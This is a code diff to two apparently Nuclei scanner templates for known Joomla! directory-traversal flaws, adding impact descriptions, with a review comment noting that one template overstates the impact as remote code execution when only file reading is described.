@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12082 - https://www.exploit-db.com/exploits/12082
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100fd165e012bb572dc265b83b5ca8b9c947ddf01bea06fde0c71635d59e7c796e0022013898e8cab7e473e13999ca183c3d97e6bc26290443ddbae95c4946d4faf0ef0:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022069608b00d6cce302d41960d97e53dffd2328158a421962cdc5d326a3c65c13d60220253869fcf736190901161cb37df82fd67626fa6b943ac18ade19c1ade10bcba0:922c64590222798bb761d5b6d8e72950
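Review bot: The added `impact` text in this template claims remote code execution and compromise of the Joomla! CMS, but the `description` just above it describes only reading arbitrary files via `..` in the `view` parameter, and `severity` stays `medium`. The sibling templates in this commit for the same bug class (SVMap, News Portal, Highslide JS) limit their impact to file disclosure. Unless code execution has been demonstrated for this component, I would narrow the text to `Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.` If RCE really is reachable, the severity and description should be raised to match, because triage tooling that reads these fields would otherwise get conflicting signals.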


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12086 - https://www.exploit-db.com/exploits/12086
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100c6e61051c3e71766db8c93f1cba690d9e313100d617e7e936a55e737e9bfb3a802206edbc197346bf2a84a7297e202c7b67251c8f0546df7eb690cfaaa5d18b11595:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402203ab74f27464637000a111771ceabe7ebf60c232bbce13a6e98a322da6de8bee8022004e7174b83c84a10ed6ef3361845038a32769c167a8c9af5e13cf68801097e59:922c64590222798bb761d5b6d8e72950
